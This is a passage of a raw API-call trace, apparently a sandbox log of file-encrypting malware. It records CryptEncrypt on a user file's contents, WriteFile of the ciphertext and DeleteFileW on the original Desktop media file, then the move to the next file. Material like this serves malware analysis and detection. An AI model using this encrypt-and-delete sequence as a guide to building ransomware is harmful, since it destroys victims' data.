dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x50d0) returned 1 [0119.981] CharLowerBuffW (in: lpsz="byte[20689]", cchLength=0xb | out: lpsz="byte[20689]") returned 0xb [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0119.981] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50d1) returned 0x4525280 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x452a360 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50c5) returned 0x452f430 [0119.982] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0119.982] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0119.982] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0119.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43caec8 [0119.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caec8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0119.983] CryptEncrypt (in: hKey=0x41ac140, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4525280*, pdwDataLen=0x144e790*=0x50c5, dwBufLen=0x50d0 | out: pbData=0x4525280*, pdwDataLen=0x144e790*=0x50d0) returned 1 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0119.983] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0119.983] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0119.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0119.983] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.016] WriteFile (in: hFile=0x2a0, lpBuffer=0x453e6c8*, nNumberOfBytesToWrite=0x50d0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x453e6c8*, lpNumberOfBytesWritten=0x144f194*=0x50d0, lpOverlapped=0x0) returned 1 [0120.017] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0120.017] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.017] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0120.018] CryptDestroyKey (hKey=0x41ac140) returned 1 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8ab0 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.018] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.018] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0120.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0120.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0120.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.018] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0120.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0120.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0120.019] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8f00 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.019] FreeLibrary (hLibModule=0x756e0000) returned 1 [0120.019] CloseHandle (hObject=0x258) returned 1 [0120.019] CloseHandle (hObject=0x2a0) returned 1 [0120.021] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4", lpFilePart=0x0) returned 0x30 [0120.021] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\9irmcppbnuygc4yelr9w.mp4")) returned 0x20 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0120.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0120.021] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc36e39c0, ftCreationTime.dwHighDateTime=0x1d5ec74, ftLastAccessTime.dwLowDateTime=0x7de735d0, ftLastAccessTime.dwHighDateTime=0x1d5e9d8, ftLastWriteTime.dwLowDateTime=0x7de735d0, ftLastWriteTime.dwHighDateTime=0x1d5e9d8, nFileSizeHigh=0x0, nFileSizeLow=0x50c5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9IrmcPpBnuYGc4Yelr9W.mp4", cAlternateFileName="9IRMCP~1.MP4")) returned 0x41ac2c0 [0120.021] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\9IrmcPpBnuYGc4Yelr9W.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\9irmcppbnuygc4yelr9w.mp4")) returned 1 [0120.034] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc36e39c0, ftCreationTime.dwHighDateTime=0x1d5ec74, ftLastAccessTime.dwLowDateTime=0x7de735d0, ftLastAccessTime.dwHighDateTime=0x1d5e9d8, ftLastWriteTime.dwLowDateTime=0x7de735d0, ftLastWriteTime.dwHighDateTime=0x1d5e9d8, nFileSizeHigh=0x0, nFileSizeLow=0x50c5, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="9IrmcPpBnuYGc4Yelr9W.mp4", cAlternateFileName="9IRMCP~1.MP4")) returned 0 [0120.034] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0120.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921f0 | out: hHeap=0x1780000) returned 1 [0120.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0120.034] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e568 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0120.035] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0120.035] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0120.035] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0120.035] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0120.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0120.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0120.035] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0120.035] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.035] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0120.036] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.037] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0120.037] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\9PZJqif.m4a", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd910d10, ftCreationTime.dwHighDateTime=0x1d5e636, ftLastAccessTime.dwLowDateTime=0x7aad2b30, ftLastAccessTime.dwHighDateTime=0x1d5e25e, ftLastWriteTime.dwLowDateTime=0x7aad2b30, ftLastWriteTime.dwHighDateTime=0x1d5e25e, nFileSizeHigh=0x0, nFileSizeLow=0x8473, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="9PZJqif.m4a", cAlternateFileName="")) returned 0x41ac200 [0120.037] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0120.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0120.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43925e0 [0120.037] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0120.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43925e0 | out: hHeap=0x1780000) returned 1 [0120.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9dd0 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0120.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0120.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 